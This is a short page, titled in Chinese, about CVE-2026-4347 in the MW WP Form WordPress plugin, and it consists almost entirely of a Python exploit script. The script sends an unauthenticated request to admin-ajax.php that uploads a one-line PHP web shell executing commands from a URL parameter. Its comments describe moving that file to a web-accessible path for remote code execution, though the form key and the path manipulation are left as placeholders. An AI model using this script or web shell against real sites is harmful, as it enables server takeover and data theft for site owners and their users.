CVE-2026-4347: MW WP Form插件任意文件移动漏洞

import requests # Exploit Title: MW WP Form < 5.1.0 - Unauthenticated Arbitrary File Move to RCE # Date: 2026-04-02 # Exploit Author: Analyst # Vendor Homepage: https://wordpress.org/plugins/mw-wp-form/ # Version: <= 5.1.0 # Usage: python3 exploit.py <target_url> def exploit(target_url): upload_url = f"{target_url}/wp-admin/admin-ajax.php" # The form must have a file upload field and 'Saving inquiry data in database' enabled # This payload attempts to move a uploaded file to a web accessible location data = { 'mw_wp_form_service': 'save', 'mw_wp_form_key': '<FORM_KEY>', # Replace with actual form key found in page source # ... other form fields ... } files = { 'file_field_name': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/octet-stream') } # Vulnerability allows manipulating the path via generate_user_filepath # This is a conceptual representation of the parameter manipulation response = requests.post(upload_url, data=data, files=files) if response.status_code == 200: print("[+] Payload sent. Check if the file was moved to the target directory.") else: print("[-] Exploit failed.") if __name__ == "__main__": import sys if len(sys.argv) != 2: print(f"Usage: {sys.argv[0]} <target_url>") else: exploit(sys.argv[1])